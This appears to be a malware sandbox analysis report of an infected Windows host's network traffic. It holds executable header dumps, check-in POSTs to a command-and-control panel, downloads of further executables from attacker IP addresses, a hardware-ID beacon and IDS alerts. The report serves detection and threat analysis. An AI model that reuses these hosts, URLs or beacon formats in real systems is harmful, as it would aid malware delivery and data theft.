2a 00 00 06 00 00 00 0c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2a 00 00 22 00 00 00 12 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:52 GMTContent-Type: application/octet-streamContent-Length: 4467200Last-Modified: Sat, 30 Nov 2024 01:19:55 GMTConnection: keep-aliveETag: "674a683b-442a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 65 49 49 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 4a 4f 00 00 d8 78 00 00 32 00 00 00 c0 ca 00 00 10 00 00 00 60 4f 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 ca 00 00 04 00 00 0a 72 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 30 76 00 73 00 00 00 00 20 76 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 9d ca 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 9d ca 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 76 00 00 10 00 00 00 3c 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 20 76 00 00 02 00 00 00 4c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 76 00 00 02 00 00 00 4e 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 38 00 00 40 76 00 00 02 00 00 00 50 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 79 69 6a 74 61 62 62 00 c0 1b 00 00 f0 ae 00 00 b2 1b 00 00 52 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 6b 62 76 70 6f 6f 7a 00 10 00 00 00 b0 ca 00 00 04 00 00 00 04 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 ca 00 00 22 00 00 00 08 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:52 GMTContent-Type: application/octet-streamContent-Length: 2765824Last-Modified: Sat, 30 Nov 2024 03:03:30 GMTConnection: keep-aliveETag: "674a8082-2a3400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 b9 3a 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 78 62 6d 66 7a 76 68 62 00 e0 29 00 00 a0 00 00 00 d2 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 74 67 67 72 6c 70 7a 00 20 00 00 00 80 2a 00 00 06 00 00 00 0c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2a 00 00 22 00 00 00 12 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:07:05 GMTContent-Type: application/octet-streamContent-Length: 2038784Last-Modified: Sat, 30 Nov 2024 01:37:00 GMTConnection: keep-aliveETag: "674a6c3c-1f1c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 d9 52 43 b2 b8 3c 10 b2 b8 3c 10 b2 b8 3c 10 ac ea b8 10 ac b8 3c 10 ac ea a9 10 ad b8 3c 10 ac ea bf 10 cd b8 3c 10 95 7e 47 10 b1 b8 3c 10 b2 b8 3d 10 33 b8 3c 10 ac ea b6 10 b3 b8 3c 10 ac ea a8 10 b3 b8 3c 10 ac ea ad 10 b3 b8 3c 10 52 69 63 68 b2 b8 3c 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 18 5b c6 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 7c 05 00 00 ec 00 00 00 00 00 00 00 50 4c 00 00 10 00 00 00 90 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 4c 00 00 04 00 00 a1 26 1f 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 60 06 00 34 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c ff 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 06 00 00 10 00 00 00 ae 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 34 82 00 00 00 60 06 00 00 3c 00 00 00 be 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 00 00 00 fa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 00 07 00 00 02 00 00 00 fc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6c 67 66 72 74 61 73 00 00 1b 00 00 40 31 00 00 f6 1a 00 00 fe 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 69 70 71 64 69 7a 68 00 10 00 00 00 40 4c 00 00 06 00 00 00 f4 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 4c 00 00 22 00 00 00 fa 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /files/6802601040/SxQyhJr.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010480001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010481001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010482001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCGDBGCAAEBFIECGHDGHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 37 31 37 35 42 36 37 42 38 31 31 30 37 33 34 30 34 30 39 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 2d 2d 0d 0a Data Ascii: ------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="hwid"C47175B67B81107340409------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="build"drum------DGCGDBGCAAEBFIECGHDG--
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010483001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010484001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010485001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 34.149.100.209 34.149.100.209
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49782 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49797 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49803 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49810 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49815 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49823 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49822 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49828 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49836 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49800 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49840 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49877 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49892 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49894 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49924 -> 31.41.244.11:80

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_006EBE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

6_2_006EBE30

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /files/6802601040/SxQyhJr.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
